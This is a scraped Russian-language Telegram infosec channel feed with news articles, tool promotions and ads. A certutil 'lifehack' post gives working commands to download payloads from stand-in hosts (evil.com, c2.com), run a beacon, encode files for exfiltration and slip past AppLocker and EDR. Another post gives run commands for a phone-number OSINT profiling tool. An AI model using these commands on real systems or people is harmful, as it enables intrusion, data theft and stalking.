CyberGuard
قناة بسيطة
Полезные инструменты, репозитории статьи и новости из мира ИБ и Хакинга Ссылка для друга: https://t.me/+ToMfaM5mK4w0NzBi По рекламе: @data_owner
إظهار المزيد4 779
المشتركون
-124 ساعات
-177 أيام
+430 أيام
أرشيف المشاركات
4 780
👩💻 Modlishka
Modlishka позволяет использовать автоматический обратный HTTP-прокси. Пользователь также может применить данный инструмент для автоматического «отравления» кэша браузера HTTP 301. Кроме того, он может использовать его для захвата URL-адресов, отличающихся от TLS. Modlishka поддерживает большинство методов многофакторной аутентификации и может выявлять и выделять уязвимости типа 2FA.
➡️ Ссылка на GitHub
Hacking & InfoSec Base || #Репозиторий
4 780
🖨 Твой принтер - шпион. И он уже отправил твой паспорт в сеть
Приветствую наших читателей! 👋
Думаешь, принтер — это просто железка, которая печатает документы? Ха-ха, нет. Это полноценный компьютер с процессором, операционной системой, жёстким диском и веб-интерфейсом, который висит в твоей сети 24/7. И защищён он примерно как картонная коробка с надписью «не вскрывать».
Пока ты печатаешь договоры, паспортные данные и налоговые декларации, твой принтер сохраняет их копии на своём диске. А ещё он открыт для любого, кто знает, как постучать в нужный порт.
Разбираем, как хакеры читают твои документы через Wi-Fi и что с этим делать. Погнали! ⚡️
🔍 Как хакеры заходят в твой принтер
Современный принтер — это IoT-устройство с кучей сетевых сервисов. И почти все они дырявые:
🔴 Открытый порт 631 (IPP) — Internet Printing Protocol, который позволяет отправлять документы на печать по сети. Если он открыт для внешнего мира, злоумышленники могут перехватывать документы, выполнять код на принтере и даже использовать его для атак на другие устройства. 🔴 Веб-интерфейс без авторизации — в 2026 году обнаружили уязвимость CVE-2026-13753 в принтерах HP Deskjet 2800. Она позволяет получить доступ к API принтера без пароля и вытащить Wi-Fi Direct-пароли, SNMP-настройки и административные данные. Патча до сих пор нет. 🔴 Отозванные сертификаты — у принтеров EPSON нашли корневые сертификаты, которые уже давно отозваны. Это позволяет хакерам подделывать защищённое соединение и перехватывать всё, что принтер отправляет в сеть — документы, логины, пароли. 🔴 Дефолтные пароли — admin/admin, 123456, password. Производители до сих пор не перестали их ставить.💀 Что могут сделать хакеры с твоим принтером 1. Украсть все твои документы — принтер хранит копии всего, что ты печатал или сканировал. Паспорта, договоры, медицинские карты — всё это лежит на его диске и ждёт, пока кто-то зайдёт и скопирует. 2. Перехватывать документы на лету — при печати по Wi-Fi данные летят по воздуху в открытом виде (если нет шифрования). Хакер может перехватить их прямо в момент отправки. 3. Внедриться в твою сеть — взломанный принтер становится плацдармом для атаки на компьютеры, NAS-хранилища и другие устройства. Через него можно запускать вредоносное ПО и перехватывать трафик всей сети. 4. Устроить хаос — хакеры могут заставить принтер печатать тонны мусора, выводить странные сообщения или просто заблокировать его, требуя выкуп. 🗣 Реальный кейс: дрон со смартфоном охотится за твоими документами Исследователи из Сингапура привязали смартфон к мультикоптеру, установили на него специальное ПО и запустили по офисным коридорам. Смартфон сканировал Wi-Fi-принтеры, подменял их точку доступа собой и перехватывал все документы, которые отправляли на печать. Жертвы даже не подозревали, что их «принтер» — это дрон за окном. Беспилотник легко поднимается на десятки этажей, и его никто не заметит. 🛡 Как защититься от «принтерного» шпионажа
1. Отключи Wi-Fi Direct, если не используешь — это одна из главных дыр. 2. Закрой порт 631 для внешнего мира — если не нужен IPP, отключи его. Если нужен — используй только с шифрованием (IPP over TLS). 3. Смени дефолтный пароль — admin/admin — это приглашение для хакеров. 4. Обновляй прошивку — патчи закрывают известные уязвимости. 5. Изолируй принтер в отдельной сети — чтобы даже взломанный принтер не мог добраться до твоих компьютеров. 6. Очищай память принтера — большинство моделей позволяют удалить историю печати. Делай это регулярно. 7. Проверь, открыт ли твой порт — команда для Windows: netstat -an | find ":631", для Linux/Mac: sudo netstat -tulnp | grep ":631".🧬 Итог Твой принтер хранит твои секреты. И он не умеет их хранить. Паспорта, договоры, налоговые — всё это лежит на его диске в открытом доступе. Пока ты думаешь, что защищён, кто-то уже читает твои документы через Wi-Fi. Проверь свои настройки. Смени пароль. И запомни: принтер — это не просто железка. Это шпион в твоём доме. CyberGuardе || #Статья
4 780
Утро начинается не с кофе, а с GOFFEE. F6 изучила новые техники
APT-группировки.
Специалисты Лаборатории цифровой криминалистики и исследования вредоносного кода F6 исследовали атаку кибершпионов на одну
из российских компаний.
🔴Как они работают — читайте в материале.
4 780
💻 Хочешь быть круче одноклассников? Научись защищать свой телефон
Приветствую наших читателей! 👋
Думаешь, если ты в школе, за партой и под присмотром учителя — ты в безопасности? Ха-ха, нет. Твой школьный Wi-Fi, общий доступ к сети в библиотеке и даже подключение к домашнему роутеру — это открытые ворота для тех, кто знает, как зайти.
🎯 Кому этот курс:
🔴 Школьникам 12–17 лет — чтобы понимать, что происходит в твоём телефоне на самом деле. 🔴 Родителям — чтобы объяснить детям про безопасность простым языком. 🔴 Учителям и классным руководителям — чтобы закрыть тему «Цифровая гигиена» на уроках информатики.CyberGuardе|| #Курсы
4 780
🗝 КАК ПРЯТАТЬ СЕКРЕТЫ. Полный ГАЙД по хранению информации.
📹 ПервоисточникCyberGuardе| Вакансии | Чат || #Видео
4 780
🌐GeoVista — Агентная система визуального рассуждения с веб-расширением для точной геолокации
GeoVista — это продвинутая система на базе ИИ-агентов, предназначенная для определения географического местоположения по изображениям (геолокации) с использованием стратегий визуального рассуждения и внешнего поиска информации.
Проект решает сложные задачи «визуального ориентирования», имитируя действия эксперта: агент анализирует детали на фото (архитектуру, дорожные знаки, ландшафт) и использует веб-поиск для проверки гипотез.🐱 Ссылка на GitHub CyberGuardе |Вакансии | Чат ||#Репозитории
4 780
Вы когда-нибудь сталкивались с ситуацией, когда интернет-магазин не отправил товар и исчез с деньгами? Чаще всего мы думаем, что это единичный случай. Но реальность гораздо серьезнее.
По данным экспертов F6, киберпреступники все чаще создают целые паутины фальшивых интернет-магазинов под разными юрлицами, доменами и реквизитами, но с единым центром управления.
Признаки фиктивного магазина в такой сети:
– разные юрлица для каждой точки;
– разные домены и платежные реквизиты;
– различный дизайн;
– смена реквизитов при оплате.
От блокировки одного магазина схема не рушится – сеть продолжит работать. Мошенники оперативно запускают новые ресурсы – у них всегда есть резервные домены и юрлица.
Почему проверка одного мерчанта бесполезна и как работает F6 Fraud Protection – в нашем материале.
Реклама. АО "БУДУЩЕЕ". ИНН 9709109340.
4 780
💀 Северокорейские хакеры используют квантовое шифрование и Zero-Day в Windows — и ты даже не заметишь
Приветствую наших читателей! 👋
Думаешь, квантовые компьютеры — это что-то из далёкого будущего, о чём беспокоятся только физики в лабораториях? Ха-ха, нет. Северокорейская группировка Lazarus уже использует пост-квантовое шифрование в реальных атаках. Прямо сейчас. Против оборонных компаний Европы и Индии.
Check Point Research обнаружила, что Lazarus внедрила алгоритм Kyber/ML-KEM — тот самый, который NIST стандартизировала в 2024 году для защиты от квантовых атак — в свою вредоносную цепочку. Вместе с Zero-Day уязвимостью в ядре Windows, которая даёт полный контроль над системой.
Разбираем, как работает эта атака и почему она страшнее, чем ты думаешь. Погнали! ⚡️
🔍 Что такое пост-квантовое шифрование и при чём здесь хакеры
Kyber/ML-KEM — это алгоритм обмена ключами, устойчивый к взлому квантовым компьютером. Обычные алгоритмы типа RSA или ECC через 5–10 лет можно будет взломать за часы, когда квантовые машины станут достаточно мощными. А Kyber — нет. Lazarus использует этот алгоритм прямо сейчас, чтобы защитить свой командный канал от перехвата и расшифровки. Даже если спецслужбы перехватят трафик — они не смогут его прочитать. Ни сегодня, ни через десять лет. Атакующие опережают время.💻 Цепочка атаки: от фальшивой вакансии до ядра Windows Всё начинается с Operation Dream Job — классической схемы Lazarus, где хакеры притворяются рекрутерами и рассылают фальшивые предложения о работе сотрудникам оборонных компаний. Жертвами стали организации, разрабатывающие системы наблюдения, дроны и робототехнику во Франции, Германии, Бразилии и Индии. Цепочка заражения выглядит так:
1. Фишинг — сотрудник получает «предложение работы» от имени известной компании. 2. Первый загрузчик MISTPEN — вредонос загружается в память и начинает общаться с командным сервером через OneDrive, используя Microsoft Graph API. 3. Сбор данных — MISTPEN собирает информацию о системе. 4. Запрос ключей — загрузчик запрашивает у сервера четыре публичных ключа. 5. Квантовое рукопожатие — используя Kyber/ML-KEM, вредонос генерирует сеансовый ключ и отправляет его на сервер. 6. Получение эксплойта — сервер отдаёт зашифрованный Zero-Day эксплойт. 7. Эскалация привилегий — эксплойт CVE-2026-68820 в драйвере AFD.sys (use-after-free race condition) повышает права до SYSTEM. 8. Установка руткита FudModule v3.1 — полный контроль над системой.🛠 Что делает FudModule v3.1 Это не просто руткит. Это мясорубка для твоей защиты:
🔴 Отключает телеметрию и колбэки. 🔴 Удаляет минифильтры файловой системы. 🔴 Убивает NT Kernel Logger. 🔴 Ослепляет 94 провайдера Event Tracing for Windows (ETW).То есть твой EDR, SIEM и антивирус просто перестают видеть, что происходит в системе. А новая фишка версии 3.1 — взлом Smart App Control (защиты от запуска неподписанного кода). Руткит сбрасывает его политику и принудительно перезагружает механизм проверки целостности кода. Иными словами, система думает, что защищена. Но на самом деле она полностью открыта. Если хочешь ещё таких разборов — ставь огонь, идиот. И не забудь обновить Windows. 🔥 CyberGuardе || #Статья
4 780
💻 Ты не знаешь этих 3 лайфхаков Windows — а хакеры уже используют их против тебя
Приветствую наших читателей! 👋
Думаешь, ты знаешь Windows вдоль и поперёк? Ха-ха, нет. Есть 3 скрытых функции, о которых молчат 90% админов — а злоумышленники используют их каждый день. И они уже встроены в твою систему.
1. Windows + V — твой тайный шпион
Ты знал про Ctrl+V. Но Windows+V открывает историю буфера обмена — и там лежит всё, что ты копировал за последние часы: пароли, адреса, номера карт.
🛡 Что делать: Win+V → Очистить историю. Или отключи её в настройках → Система → Буфер обмена.2. Win + . (точка) — скрытый доступ к эмодзи и символам Да, это просто панель эмодзи. Но хакеры используют её для вставки скрытых символов в фишинговые письма — они не видны глазу, но обманывают фильтры.
🛡 Что делать: будь внимателен к нестандартным символам в ссылках и файлах.3. Ctrl + Shift + Esc — прямой доступ к диспетчеру задач Этот лайфхак знают все. Но мало кто знает, что Ctrl + Shift + Esc открывает диспетчер без лишних кликов — и это единственный способ заметить, что твой комп работает на кого-то ещё.
🛡 Что делать: проверяй вкладку «Автозагрузка» — если видишь незнакомые процессы, гугли их названия.🧬 Итог Эти 3 лайфхака — не просто кнопки. Это твои глаза в системе. Закрой дыры, пока их не закрыли за тебя. Ставь огонь если пользуешься Windows. 🔥 CyberGuardе || #Лайфхак
4 780
🕵️♂️ Один номер — и ты уже под колпаком: Wiwok сделает это за 5 секунд
Приветствую наших читателей! 👋
Думаешь, чтобы пробить человека по номеру телефона, нужно платить за базы или регистрироваться в сомнительных сервисах? Ха-ха, нет. Wiwok делает это в терминале — бесплатно, без API-ключей и без регистрации.
Вбиваешь номер в формате E.164 — и инструмент прогоняет его через 68 модулей: соцсети, форумы, базы утечек, публичные записи. Автоматически подхватывает найденные email'ы и юзернеймы и пробивает уже их. Всё — параллельно, за секунды. На выходе — HTML-отчёт с оценкой достоверности каждого найденного следа.
🔍 Что умеет Wiwok:
🔴 Ищет по номеру телефона, email, юзернейму или полному имени. 🔴 Не требует API-ключей — установил и запустил. 🔴 68 встроенных модулей — социальные сети, GitHub, академические базы, публичные записи. 🔴 Автоматически цепляется за найденные данные и пробивает их дальше. 🔴 Отмечает находки тегами HIGH / MEDIUM / LOW — сразу понятно, чему можно верить. 🔴 Выдаёт результат в JSON, TXT и красивом HTML-отчёте.🛠 Как запустить за минуту:
git clone https://github.com/kirozaku/wiwok
cd wiwok
python3 wiwok.py --setup
python3 wiwok.py +71234567890
Готово. Через пару секунд ты видишь все профили, утечки и связи, которые есть в открытом доступе.
А теперь, идиот, жми на 🔥, если хочешь больше таких разборов.
CyberGuardе || #Инструмент4 780
Пока все спорят, какая нейросеть «самая лучшая»…
кто-то уже просто берёт и использует то, что реально работает.
В AIMarketCap мы не кормим хайпом.
Мы собираем рабочий арсенал:
🟣свежие инструменты без воды
🟣промпты, которые сразу дают результат
🟣связки сервисов под конкретные задачи
🟣честные сравнения, а не восторженные обзоры
🟣лайфхаки, которые экономят часы, а не просто «интересные»
Здесь не про «будущее уже наступило».
Здесь про то, как это будущее применять сегодня - в текстах, картинках, видео, аналитике и рутине.
Если хотите меньше читать про ИИ
и больше им пользоваться -
заходите 👇
➡️ https://t.me/+Ta3ORoyAZLI2NmYy
Один клик. И вместо хаоса вкладок - понятная система.
4 780
🎧 AliExpress прослушивает твои наушники — и ты даже не заметишь
Приветствую наших читателей! 👋
Думаешь, чтобы сайт тебя отслеживал, нужны куки или хотя бы регистрация? Ха-ха, нет. Достаточно открыть вкладку AliExpress — и твой собственный компьютер начнёт тихо «стучать» на хозяев. Буквально. Через наушники. И ты ничего не услышишь.
В августе 2026 года разработчик случайно обнаружил, что сайт AliExpress запускает неслышимый звук и анализирует, как твоё устройство его обрабатывает. Всё это — чтобы создать уникальный цифровой отпечаток твоего железа. И обойти этот трекинг нельзя даже отключением звука. Погнали! ⚡️
🔍 Как это работает: тишина, которая говорит
Разработчик под ником m-c-tech заметил странность: его Bluetooth-наушники с поддержкой multipoint перестали переключаться между компьютером и телефоном. Стоило закрыть вкладку AliExpress — всё возвращалось в норму.
Он залез в код и нашёл два сильно обфусцированных скрипта — collina.js и fireyejs.js, размещённые в инфраструктуре Alibaba. Эти скрипты:
🔴 Создавали два объекта AudioContext в браузере. 🔴 Генерировали пилообразный звуковой сигнал. 🔴 Пропускали его через узел GainNode с громкостью, установленной в ноль. 🔴 Подключали цепочку к системному аудиовыходу.Пользователь ничего не слышит. Но браузер продолжает обрабатывать звуковой поток, потому что цепочка остаётся активной. 💀 Что сайт узнаёт о твоём устройстве Каждый процессор, звуковая карта, операционная система и браузер обрабатывают один и тот же аудиосигнал с микроскопическими различиями. AliExpress измеряет эти вариации и добавляет их к общему «отпечатку» устройства. Но WebAudio — это лишь верхушка айсберга. Скрипты также собирают данные о:
🟢 Canvas и WebGL (как рендерится графика). 🟢 Разрешении экрана, CPU и памяти. 🟢 WebRTC и поддерживаемых форматах. 🟢 Таймингах браузера и движениях мыши.Всё это складывается в уникальный цифровой отпечаток, который позволяет сайту узнавать тебя при каждом визите — даже если ты чистишь куки, включаешь VPN или заходишь в режиме инкогнито. 🗣 «Но это же не прослушка!» Исследователи действительно подчёркивают: AliExpress не записывал разговоры и не включал микрофон. Сайт не слушает тебя — он сам создаёт сигнал внутри твоего компьютера и смотрит, как тот реагирует. Но это не делает ситуацию менее тревожной.
Brave, которая публично заявила об этом методе, описывает его как использование аудиосистемы для трекинга. И это работает там, где обычные куки бессильны. Главная страница AliExpress незаметно создаёт два работающих WebAudio-графа и подключает их через zero-gain node к системному аудиоприёмнику. Отключить звук на вкладке нельзя — там нет обычного медиаэлемента для отключения.🛡 Что делать прямо сейчас:
1. Закрывай вкладку AliExpress, когда не пользуешься сайтом. Это единственное, что гарантированно останавливает аудиопоток. 2. Используй Brave — браузер уже заявил, что защищает от подобного отслеживания. 3. Отключай Bluetooth-наушники от компьютера, если они не нужны — так ты хотя бы не заметишь эту активность. 4. Проверяй консоль разработчика (F12 → вкладка Network) — если видишь запросы к collina.js или fireyejs.js, знаешь, что тебя «слушают».CyberGuardе |#Статья
4 780
Awesome Pentest Cheat Sheets Awesome
Коллекция шпаргалок и контрольных списков, полезных для обеспечения безопасности и пентестирования.Список содержит огромный список тщательно отсортированных и отобранных ресурсов, что поможет вам сэкономить много времени.
➡️ Смотри тут
CyberGuardе | Вакансии | Чат | #Репозиторий
4 780
Repost from Карманный хакер
👍 Вот оно и случилось... мы выпустили ролик на ютуб
Вместе с каналом «CodeGuard» разобрали сетевую базу, без которой сложно двигаться в ИБ.
📱 Смотреть ролик
https://youtu.be/_zDkGX87Rms
https://youtu.be/_zDkGX87Rms
https://youtu.be/_zDkGX87Rms
С любовью
Карманный хакер | CodeGuard: PySec Edition
4 780
💡 Лайфхак: certutil — больше, чем просто управление сертификатами
Приветствую наших читателей! 👋
Думаешь,
certutil нужен только для работы с сертификатами? Ха-ха, нет. Это скрытый швейцарский нож Windows, который умеет скачивать файлы, декодировать base64, вычислять хеши и даже загружать полезную нагрузку в обход политик. При этом он — легитимный системный бинарник, подписанный Microsoft, и его редко блокируют. Погнали! ⚡️
🛠 Что умеет certutil (и почему это круто):
1. Скачивание файлов без PowerShell (и без разрешения на скрипты)
Когда PowerShell отключен или ограничен, certutil приходит на помощь:
certutil -urlcache -split -f http://evil.com/payload.exe C:\Users\Public\payload.exe
-urlcache — скачивает файл по ссылке.
-split — сохраняет как есть (без дополнительных метаданных).
-f — принудительно перезаписывает, даже если файл уже есть.
Готово. Файл на диске. Без Invoke-WebRequest, без System.Net.WebClient. И без логов PowerShell.
2. Декодирование base64 в исполняемый файл
Если не хочешь светить скачивание, можно передать полезную нагрузку через командную строку в base64. На целевой машине certutil раскодирует её обратно:
certutil -decode encoded.txt payload.exe
Где encoded.txt — текст в base64. За секунды получаешь готовый .exe. Никаких запросов в сеть.
3. Кодирование файла в base64 для эксфильтрации
Обратная задача — сжать файл в base64, чтобы вытащить его через текстовый канал:
certutil -encode C:\secret\document.pdf encoded.txt
Теперь зашифрованный текст можно скопировать в буфер и отправить через DNS-запросы или просто вставить в сообщение.
4. Вычисление хешей (MD5, SHA1, SHA256) для проверки целостности
Установил эксплойт? Проверь, тот ли файл:
certutil -hashfile payload.exe MD5
certutil -hashfile payload.exe SHA1
certutil -hashfile payload.exe SHA256
Полезно, чтобы убедиться, что файл не повреждён при передаче.
5. Обход ограничений AppLocker и WDAC
certutil — подписан Microsoft и входит в белые списки по умолчанию. Многие политики безопасности разрешают его запуск, даже если они блокируют powershell.exe. Этим пользуются злоумышленники для загрузки и выполнения вредоносных компонентов.
🗣 Почему это удобно:
✔️ Легитимный бинарник — не вызывает подозрений у EDR.
✔️ Работает офлайн — не требует интернета для декодирования.
✔️ Всегда есть — встроен в Windows Server и десктопные версии.
✔️ Обходит политики — часто не блокируется, даже когда PowerShell и CMD ограничены.
Пример цепочки:
1. certutil -urlcache -split -f http://c2.com/beacon.exe beacon.exe
2. certutil -hashfile beacon.exe SHA1 — проверяем хеш.
3. beacon.exe — запускаем.
CyberGuardе| Вакансии | Чат | #Лайфхак4 780
👩💻 Всем программистам посвящается!
Вот 14 авторских обучающих IT каналов по самым востребованным областям программирования:
Выбирай своё направление:
👩💻 Python — t.me/python_ready
🤔 InfoSec & Хакинг — t.me/hacking_ready
🖥 SQL & Базы Данных — t.me/sql_ready
👩💻 IT Новости — t.me/it_ready
🤖 AI & ML — t.me/neuro_ready
👩💻 Frontend — t.me/frontend_ready
👩💻 C/C++ — https://t.me/cpp_ready
👩💻 C# & Unity — t.me/csharp_ready
👩💻 Linux — t.me/linux_ready
👩💻 Java — t.me/java_ready
📖 IT Книги — t.me/books_ready
📱 JavaScript — t.me/javascript_ready
🖼️ DevOps — t.me/devops_ready
🖥 Design — t.me/design_ready
📌 Гайды, шпаргалки, задачи, ресурсы и фишки для каждого языка программирования!
4 780
🔐 Полнофункциональная реализация I2P клиента на С++
I2P (Invisible Internet Protocol) является универсальным анонимным сетевым уровнем.
Все коммуникации по I2P анонимны и защищены сквозным шифрованием, участники не раскрывают своих реальных IP адресов.
💠 Ссылка на F-Droid
CyberGuardе| Вакансии | Чат | #Репозиторий
4 780
Слили в телеграмм тонны инфы и отсортировали по каналам
☁️ Хакинг & ИБ — 756GB
🤒 OSINT — 315GB
🖥 Курсы & GitHub — 1579GB
⌨️ Python — 955GB
🙃 Linux & Bash — 459GB
😦 Работа в IT — 778GB
🖥 Общий архив — 2346GB
➡️ Практические инструкции, курсы, книги и инструменты.
